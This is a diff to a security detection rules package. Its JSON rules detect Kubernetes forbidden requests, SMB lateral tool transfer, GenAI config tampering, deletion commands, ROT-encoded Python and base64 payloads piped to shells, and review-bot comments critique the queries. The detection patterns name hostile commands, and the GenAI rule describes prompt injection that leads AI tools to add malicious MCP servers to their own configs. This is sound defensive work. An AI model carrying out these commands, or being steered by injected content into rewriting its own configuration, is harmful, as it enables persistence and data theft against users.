Ensure these environments are accounted for by excluding their user agents to avoid unnecessary alerts.\n- Regularly review and update the exclusion list to reflect changes in legitimate user agents used within your organization, ensuring that only truly unusual and potentially malicious agents are flagged.\n\n### Response and remediation\n\n- Immediately isolate the affected Kubernetes node or cluster to prevent further unauthorized access or potential lateral movement by the adversary.\n- Revoke any suspicious or unauthorized credentials or tokens that may have been used in the forbidden request to ensure they cannot be reused.\n- Conduct a thorough review of the Kubernetes audit logs to identify any additional unauthorized or suspicious activities that may have occurred around the time of the alert.\n- Patch any identified vulnerabilities or misconfigurations in the Kubernetes environment that may have been exploited, ensuring all components are up to date with the latest security patches.\n- Implement stricter access controls and user agent validation to prevent non-standard user agents from interacting with the Kubernetes API unless explicitly allowed.\n- Escalate the incident to the security operations team for further investigation and to determine if additional containment or remediation actions are necessary.\n- Enhance monitoring and alerting for similar activities by tuning detection systems to recognize patterns associated with this type of threat, ensuring rapid response to future incidents.\n", - "query": "any where host.os.type == \"linux\" and event.dataset == \"kubernetes.audit_logs\" and\nkubernetes.audit.stage == \"ResponseComplete\" and `kubernetes.audit.annotations.authorization_k8s_io/decision` == \"forbid\" and\nnot user_agent.original like~ (\n \"/\", \"karpenter\", \"csi-secrets-store/*\", \"elastic-agent/*\", \"agentbeat/*\", \"insights-operator*\", \"oc/*\", \"cloud-defend/*\",\n \"OpenAPI-Generator/*\", \"local-storage-operator/*\", 
\"falcon-client/*\", \"nginx-ingress-controller/*\", \"config-translator/*\",\n \"kwatch/*\", \"PrometheusOperator/*\", \"kube*\"\n)\n", - "related_integrations": [ - { - "package": "kubernetes", - "version": "^1.4.1" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "`kubernetes.audit.annotations.authorization_k8s_io/decision`", - "type": "unknown" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": false, - "name": "kubernetes.audit.stage", - "type": "keyword" - }, - { - "ecs": true, - "name": "user_agent.original", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "4b77d382-b78e-4aae-85a0-8841b80e4fc4", - "severity": "medium", - "tags": [ - "Data Source: Kubernetes", - "Tactic: Execution", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 1 - }, - "id": "4b77d382-b78e-4aae-85a0-8841b80e4fc4_1", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/58bc134c-e8d2-4291-a552-b4b3e537c60b_112.json b/packages/security_detection_engine/kibana/security_rule/58bc134c-e8d2-4291-a552-b4b3e537c60b_112.json new file mode 100644 index 00000000000..6838d1993bd --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/58bc134c-e8d2-4291-a552-b4b3e537c60b_112.json 
@@ -0,0 +1,134 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation or change of a Windows executable file over network shares. Adversaries may transfer tools or other files between systems in a compromised environment.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.file-*", + "logs-endpoint.events.network-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Lateral Tool Transfer via SMB Share", + "note": "## Triage and analysis\n\n### Investigating Potential Lateral Tool Transfer via SMB Share\n\nAdversaries can use network shares to host tooling to support the compromise of other hosts in the environment. These tools can include discovery utilities, credential dumpers, malware, etc. Attackers can also leverage file shares that employees frequently access to host malicious files to gain a foothold in other machines.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve the created file and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity can happen legitimately. 
Consider adding exceptions if it is expected and noisy in your environment.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges needed to write to the network share and restrict write access as needed.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by host.id with maxspan=30s\n [network where host.os.type == \"windows\" and event.type == \"start\" and process.pid == 4 and destination.port == 445 and\n network.direction : (\"incoming\", \"ingress\") and\n network.transport == \"tcp\" and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by process.entity_id\n /* add more executable / script extensions here if they are not noisy in your environment */\n [file where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and process.pid == 4 and user.id like (\"S-1-5-21*\", \"S-1-12-*\") and \n (file.Ext.header_bytes : \"4d5a*\" or file.extension : (\"exe\", \"scr\", \"pif\", \"com\", \"dll\", \"bat\", 
\"cmd\", \"ps1\", \"vbs\", \"vbe\", \"js\", \"jse\", \"wsh\", \"wsf\", \"sct\", \"hta\", \"cpl\"))] by process.entity_id\n", + "references": [ + "https://www.elastic.co/security-labs/elastic-protects-against-data-wiper-malware-targeting-ukraine-hermeticwiper", + "https://www.elastic.co/security-labs/hunting-for-lateral-movement-using-event-query-language" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "file.Ext.header_bytes", + "type": "unknown" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.transport", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "58bc134c-e8d2-4291-a552-b4b3e537c60b", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.002", + "name": "SMB/Windows Admin Shares", + 
"reference": "https://attack.mitre.org/techniques/T1021/002/" + } + ] + }, + { + "id": "T1570", + "name": "Lateral Tool Transfer", + "reference": "https://attack.mitre.org/techniques/T1570/" + } + ] + } + ], + "type": "eql", + "version": 112 + }, + "id": "58bc134c-e8d2-4291-a552-b4b3e537c60b_112", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/590fc62d-7386-4c75-92b0-af4517018da1_4.json b/packages/security_detection_engine/kibana/security_rule/590fc62d-7386-4c75-92b0-af4517018da1_4.json new file mode 100644 index 00000000000..e3baf776b5e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/590fc62d-7386-4c75-92b0-af4517018da1_4.json 
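Review bot: The new file omits `timestamp_override`, while the other rules added in this commit (590fc62d, 5919988c, 5ab49127) set `"timestamp_override": "event.ingested"`. With `"from": "now-9m"` and a 30-second sequence window, endpoint events ingested after the query window has passed are never evaluated, so the omission quietly lowers coverage unless it is deliberate for this sequence rule. Separately, `file.Ext.header_bytes` is still declared with `"type": "unknown"` in required_fields although this same commit resolves the identical placeholder to `keyword` for `winlog.logon.type` in 48b6edfc; the EQL compares it with a wildcard string, so `"type": "keyword"` appears to be the intended value.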
@@ -0,0 +1,111 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects unusual modification of GenAI tool configuration files. Adversaries may inject malicious MCP server configurations to hijack AI agents for persistence, C2, or data exfiltration. Attack vectors include malware or scripts directly poisoning config files, supply chain attacks via compromised dependencies, and prompt injection attacks that abuse the GenAI tool itself to modify its own configuration. Unauthorized MCP servers added to these configs execute arbitrary commands when the AI tool is next invoked.", + "from": "now-9m", + "history_window_start": "now-7d", + "index": [ + "logs-endpoint.events.file*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Unusual Process Modifying GenAI Configuration File", + "new_terms_fields": [ + "process.executable" + ], + "note": "## Triage and analysis\n\n### Investigating Unusual Process Modifying GenAI Configuration File\n\nConfiguration files for GenAI tools like Cursor, Claude, Copilot, and Ollama control which MCP servers, plugins, and extensions are loaded. Attackers target these files to inject malicious MCP servers that execute arbitrary commands, exfiltrate data, or establish persistence. 
Threats include external processes (malware, compromised scripts, supply chain attacks) directly modifying configs, as well as prompt injection attacks that abuse the AI tool's own file access capabilities.\n\n### Possible investigation steps\n\n- Identify the process that modified the configuration file and determine if it's expected (GenAI tool, installer, user action) or suspicious (unknown script, malware).\n- If the modifying process is NOT a GenAI tool, investigate its origin, parent process tree, and whether it was downloaded or executed from a suspicious location.\n- If a GenAI tool made the modification, check recent user prompts or agent activity that may have triggered the config change via prompt injection.\n- Review the contents of the modified configuration file for suspicious MCP server URLs, unauthorized plugins, or unusual agent permissions.\n- Examine the process command line and parent process tree to identify how the modifying process was invoked.\n- Check for other file modifications by the same process around the same time, particularly to other GenAI configs or startup scripts.\n- Investigate whether the GenAI tool subsequently connected to unknown domains or spawned unusual child processes after the config change.\n\n### False positive analysis\n\n- Novel but legitimate configuration changes will trigger this rule when the process hasn't been seen modifying these files within the configured history window. Review the modified file content to determine legitimacy.\n- GenAI tool updates may modify config files in new ways; correlate with recent software updates.\n- IDE extensions integrating with GenAI tools may modify configs as part of initial setup.\n- Developer tools (git, go, npm) checking out or downloading projects containing `.gemini/` or `.claude/` directories may trigger alerts. 
These are project-level configs, not user configs - verify by checking if the path is within a project directory.\n\n### Response and remediation\n\n- Review the modified configuration file and revert any unauthorized changes to MCP servers, plugins, or agent settings.\n- If malicious MCP servers were added, block the associated domains at the network level.\n- Review and rotate any API keys or credentials that may have been exposed through the compromised GenAI configuration.\n", + "query": "event.category : \"file\" and event.action : (\"modification\" or \"overwrite\") and\nfile.path : (\n */.cursor/mcp.json or */.cursor/settings.json or */AppData/Roaming/Cursor/*mcp* or\n */.claude/* or */claude_desktop_config.json or */AppData/Roaming/Claude/* or\n */.config/github-copilot/* or */AppData/Local/GitHub?Copilot/* or\n */.ollama/config* or */AppData/Local/Ollama/* or\n */.codex/* or */AppData/Roaming/Codex/* or\n */.gemini/* or */AppData/Roaming/gemini-cli/* or\n */.grok/* or */AppData/Roaming/Grok/* or\n */.windsurf/* or */AppData/Roaming/Windsurf/* or\n */.vscode/extensions/*mcp* or\n */.openclaw/* or */AppData/Roaming/OpenClaw/* or\n */.moltbot/* or */AppData/Roaming/Moltbot/* or\n */.config/openclaw/*\n) and not (\n file.extension : (lck or lock or log or png or marker) or\n file.name : .DS_Store or\n file.path : (\n */.claude/cache/* or\n */.claude/statsig/* or\n */.codex/log/* or\n */.codex/sessions/*\n ) or\n (\n file.path : */.config/github-copilot/* and \n file.name : (apps.json or versions.json or copilot*nitrite.db)\n )\n)\n", + "references": [ + "https://modelcontextprotocol.io/", + "https://www.cybereason.com/blog/security-research/weaponized-ai-how-cybercriminals-exploit-mcp-for-account-takeover", + "https://glama.ai/blog/2025-11-11-the-lethal-trifecta-securing-model-context-protocol-against-data-flow-attacks", + "https://www.elastic.co/security-labs/elastic-advances-llm-security" + ], + "related_integrations": [ + { + "package": "endpoint", + 
"version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "590fc62d-7386-4c75-92b0-af4517018da1", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", + "Domain: LLM" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1556", + "name": "Modify Authentication Process", + "reference": "https://attack.mitre.org/techniques/T1556/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1554", + "name": "Compromise Host Software Binary", + "reference": "https://attack.mitre.org/techniques/T1554/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 4 + }, + "id": "590fc62d-7386-4c75-92b0-af4517018da1_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5919988c-29e1-4908-83aa-1f087a838f63_6.json b/packages/security_detection_engine/kibana/security_rule/5919988c-29e1-4908-83aa-1f087a838f63_6.json new file mode 100644 index 00000000000..79f0e89ee21 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5919988c-29e1-4908-83aa-1f087a838f63_6.json 
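Review bot: The KQL path pattern `*/AppData/Local/GitHub?Copilot/*` relies on `?` standing in for the space in `GitHub Copilot`; KQL documents only `*` as a wildcard, so if `?` is matched literally this branch never fires and the Windows Copilot configuration directory is left uncovered — worth confirming against a rendered event before the package ships. The Defense Evasion mapping to T1556 (Modify Authentication Process) does not obviously describe modification of an MCP or plugin configuration file, whereas the Persistence mapping to T1554 matches the description; the T1556 entry deserves either a justification in the rule's source or removal. The exclusion list also drops every `.DS_Store` and `png` touch, which is sensible, but the `*/.claude/*` branch still covers project-level checkouts that the note itself flags as a known false-positive source, so that caveat belongs next to the query rather than only in the guide.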
@@ -0,0 +1,96 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "This rule identifies the execution of commands that can be used to delete files and directories. Adversaries may delete files and directories on a host system, such as logs, browser history, or malware.", + "from": "now-119m", + "index": [ + "logs-endpoint.events.process-*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "File or Directory Deletion Command", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and \n(\n ((process.name : \"rundll32.exe\" or ?process.pe.original_file_name : \"RUNDLL32.EXE\") and process.args : \"*InetCpl.cpl,Clear*\") or \n ((process.name : \"reg.exe\" or ?process.pe.original_file_name : \"reg.exe\") and process.args : \"delete\") or \n (\n (process.name : \"cmd.exe\" or ?process.pe.original_file_name : \"Cmd.Exe\") and\n process.args : (\"*rmdir*\", \"*rm *\", \"rm\", \"*del *\", \"del\", \"*erase *\", \"erase\") and\n not process.args : (\n \"*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\*\",\n \"*\\\\AppData\\\\Local\\\\Temp\\\\DockerDesktop\\\\*\",\n \"*\\\\AppData\\\\Local\\\\Temp\\\\Report.*\",\n \"*\\\\AppData\\\\Local\\\\Temp\\\\*.PackageExtraction\"\n )\n ) or\n ((process.name : \"powershell.exe\" or ?process.pe.original_file_name : \"PowerShell.EXE\") and\n process.args : (\"*rmdir\", \"rm\", \"rd\", \"*Remove-Item*\", \"del\", \"*]::Delete(*\"))\n) and not user.id : \"S-1-5-18\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + 
"type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "5919988c-29e1-4908-83aa-1f087a838f63", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Rule Type: BBR", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.004", + "name": "File Deletion", + "reference": "https://attack.mitre.org/techniques/T1070/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "5919988c-29e1-4908-83aa-1f087a838f63_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5ab49127-b1b3-46e6-8a38-9e8512a2a363_5.json b/packages/security_detection_engine/kibana/security_rule/5ab49127-b1b3-46e6-8a38-9e8512a2a363_5.json new file mode 100644 index 00000000000..cd07760c141 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5ab49127-b1b3-46e6-8a38-9e8512a2a363_5.json 
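Review bot: In the `cmd.exe` branch `process.args : "*rm *"` and `"*del *"` match as substrings of a single argument, so any argument containing `rm ` or `del ` (a path element such as `platform tools` or `model v2`) satisfies the rule, not just the deletion commands the description names. Because this is a low-severity building block the noise is bounded, but a comment in the rule's source recording that the patterns are intentionally broad — or tightening them to the command-token form the list already uses, `process.args : ("rm", "del", "erase", "rmdir")`, with the substring variants moved behind a `process.command_line` check — would make the intent explicit for whoever tunes it next.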
@@ -0,0 +1,115 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of a Python script that uses the ROT cipher for letters substitution. Adversaries may use this method to encode and obfuscate part of their malicious code in legit python packages.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "logs-endpoint.events.file-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "ROT Encoded Python Script Execution", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating ROT Encoded Python Script Execution\n\nROT encoding, a simple letter substitution cipher, is often used to obfuscate Python scripts, making them harder to analyze. Adversaries exploit this by embedding ROT-encoded scripts within legitimate packages to evade detection. 
The detection rule identifies such activities by monitoring Python script executions and the presence of ROT-encoded compiled files, flagging potential misuse on Windows and macOS systems.\n\n### Possible investigation steps\n\n- Review the process entity ID to identify the specific Python process that triggered the alert and gather details such as the process start time and command line arguments.\n- Examine the file path and name of the ROT-encoded compiled file (e.g., \"rot_??.cpython-*.pyc\") to determine its origin and whether it is part of a legitimate package or potentially malicious.\n- Check the parent process of the Python script to understand how it was initiated and whether it was executed by a legitimate application or user.\n- Investigate the user account associated with the process to determine if the activity aligns with their typical behavior or if it appears suspicious.\n- Analyze any network connections or file modifications made by the Python process to identify potential data exfiltration or further malicious activity.\n- Correlate this alert with other security events or logs from the same host to identify patterns or additional indicators of compromise.\n\n### False positive analysis\n\n- Legitimate development activities may trigger the rule if developers use ROT encoding for testing or educational purposes. To manage this, create exceptions for known development environments or specific user accounts involved in such activities.\n- Automated scripts or tools that use ROT encoding for legitimate data processing tasks can be flagged. Identify these scripts and whitelist their execution paths or associated process names to prevent false alerts.\n- Some security tools or software may use ROT encoding as part of their normal operations. 
Review and document these tools, then configure the detection system to exclude their known file paths or process identifiers.\n- Regularly scheduled tasks or cron jobs that involve ROT-encoded files for non-malicious purposes can cause false positives. Exclude these tasks by specifying their unique identifiers or execution schedules in the detection rule settings.\n\n### Response and remediation\n\n- Isolate the affected system from the network to prevent further spread of potentially malicious activity.\n- Terminate any running Python processes that are identified as executing ROT-encoded scripts to halt the execution of obfuscated code.\n- Conduct a thorough review of the affected system to identify and remove any ROT-encoded Python files, specifically targeting files matching the pattern \"rot_??.cpython-*.pyc*\".\n- Restore any affected systems from a known good backup to ensure the removal of any persistent threats.\n- Implement application whitelisting to prevent unauthorized Python scripts from executing, focusing on blocking scripts with ROT encoding patterns.\n- Escalate the incident to the security operations team for further analysis and to determine if additional systems are affected.\n- Update detection mechanisms to monitor for similar ROT-encoded script activities, enhancing the ability to detect and respond to future threats.", + "query": "sequence by process.entity_id with maxspan=1m\n [process where host.os.type in (\"windows\", \"macos\") and event.type == \"start\" and process.name : \"python*\" and\n not (\n process.args : (\"*gcloud.py\", \"*conda-script.py\", \"*compileall.py\", \"*.lmstudio*\") or\n process.parent.args : (\"*gcloud.py\", \"*conda-script.py\", \"*compileall.py\", \"*.lmstudio*\")\n )]\n [file where host.os.type in (\"windows\", \"macos\") and\n event.action != \"deletion\" and process.name : \"python*\" and file.name : \"rot_??.cpython-*.pyc*\"]\n", + "references": [ + 
"https://www.elastic.co/security-labs/dprk-code-of-conduct", + "https://www.reversinglabs.com/blog/fake-recruiter-coding-tests-target-devs-with-malicious-python-packages" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "5ab49127-b1b3-46e6-8a38-9e8512a2a363", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1140", + "name": "Deobfuscate/Decode Files or Information", + "reference": "https://attack.mitre.org/techniques/T1140/" + }, + { + "id": "T1027", + "name": "Obfuscated Files or Information", + "reference": "https://attack.mitre.org/techniques/T1027/", + "subtechnique": [ + { + "id": "T1027.013", + "name": "Encrypted/Encoded File", + "reference": "https://attack.mitre.org/techniques/T1027/013/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 5 + }, + "id": "5ab49127-b1b3-46e6-8a38-9e8512a2a363_5", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/5bdad1d5-5001-4a13-ae99-fa8619500f1a_3.json b/packages/security_detection_engine/kibana/security_rule/5bdad1d5-5001-4a13-ae99-fa8619500f1a_3.json deleted file mode 100644 index 2d4bee65655..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/5bdad1d5-5001-4a13-ae99-fa8619500f1a_3.json +++ /dev/null 
@@ -1,139 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule detects when a base64 decoded payload is piped to an interpreter on Linux systems. Adversaries may use base64 encoding to obfuscate data and pipe it to an interpreter to execute malicious code. This technique may be used to evade detection by host- or network-based security controls.", - "from": "now-9m", - "index": [ - "logs-endpoint.events.process*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Base64 Decoded Payload Piped to Interpreter", - "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Base64 Decoded Payload Piped to Interpreter\n\nBase64 encoding is a method to encode binary data into ASCII text, often used for data obfuscation. Adversaries exploit this by encoding malicious payloads and decoding them on a target system, piping the output to interpreters like bash or python for execution. 
The detection rule identifies such activities by monitoring for processes that decode Base64 and subsequently execute scripts, indicating potential malicious behavior.\n\n### Possible investigation steps\n\n- Review the process command line arguments to identify the specific Base64 decoding activity, focusing on the presence of flags like `-d` or `-a` in conjunction with tools such as `base64`, `openssl`, or scripting languages like `python`, `perl`, or `ruby`.\n- Examine the parent process entity ID and command line to understand the context in which the Base64 decoding was initiated, identifying any potentially suspicious parent processes.\n- Investigate the subsequent interpreter process that was executed, such as `bash`, `python`, or `ruby`, to determine the nature of the script or command being run, looking for any signs of malicious activity.\n- Check the timing and sequence of the processes involved to confirm if the Base64 decoding and interpreter execution occurred within the specified maxspan of 3 seconds, indicating a likely automated or scripted action.\n- Analyze the host ID and any associated user accounts to determine if the activity aligns with expected behavior for that system or user, or if it suggests unauthorized access or compromise.\n- Correlate the alert with other security events or logs from the same host or user to identify any additional indicators of compromise or related suspicious activities.\n\n### False positive analysis\n\n- Legitimate administrative scripts may use Base64 encoding to handle data securely. Review the context of the script execution and consider excluding specific scripts or directories from monitoring if they are verified as safe.\n- Automated backup or data transfer processes might use Base64 encoding for data integrity. Identify these processes and create exceptions for known, trusted applications or scripts.\n- Development environments often use Base64 encoding for testing purposes. 
If a development tool or script is frequently triggering alerts, consider excluding the specific development environment or user accounts from this rule.\n- Security tools or monitoring solutions may use Base64 encoding as part of their normal operations. Verify the source of the alert and exclude known security tools from triggering this rule.\n- System updates or package installations might involve Base64 operations. Monitor the timing and context of these alerts and exclude specific update processes if they are consistently identified as false positives.\n\n### Response and remediation\n\n- Isolate the affected system from the network to prevent further execution of potentially malicious code and lateral movement.\n- Terminate any suspicious processes identified by the detection rule, particularly those involving base64 decoding and piping to interpreters.\n- Conduct a forensic analysis of the affected system to identify any additional indicators of compromise, such as unauthorized file modifications or network connections.\n- Restore the system from a known good backup if malicious activity is confirmed and the integrity of the system is compromised.\n- Update and patch all software and systems to mitigate vulnerabilities that could be exploited by similar techniques.\n- Implement enhanced monitoring and logging for base64 decoding activities and interpreter executions to detect similar threats in the future.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if broader organizational impacts exist.\n", - "query": "sequence by host.id, process.parent.entity_id with maxspan=3s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and (\n (process.name in (\"base64\", \"base64plain\", \"base64url\", \"base64mime\", \"base64pem\", \"base32\", \"base16\") and process.command_line like~ \"*-*d*\") or\n (process.name == \"openssl\" and 
process.args == \"enc\" and process.args in (\"-d\", \"-base64\", \"-a\")) or\n (process.name like \"python*\" and\n (process.args == \"base64\" and process.args in (\"-d\", \"-u\", \"-t\")) or\n (process.args == \"-c\" and process.args like \"*base64*\" and process.command_line like~ \"*b64decode*\")\n ) or\n (process.name like \"perl*\" and process.command_line like~ \"*decode_base64*\") or\n (process.name like \"ruby*\" and process.args == \"-e\" and process.command_line like~ \"*Base64.decode64*\")\n )]\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and process.name like~ (\n \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"python*\", \"perl*\", \"ruby*\", \"lua*\", \"php*\"\n )]\n", - "related_integrations": [ - { - "package": "endpoint", - "version": "^8.2.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.id", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.args", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.command_line", - "type": "wildcard" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.parent.entity_id", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "5bdad1d5-5001-4a13-ae99-fa8619500f1a", - "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
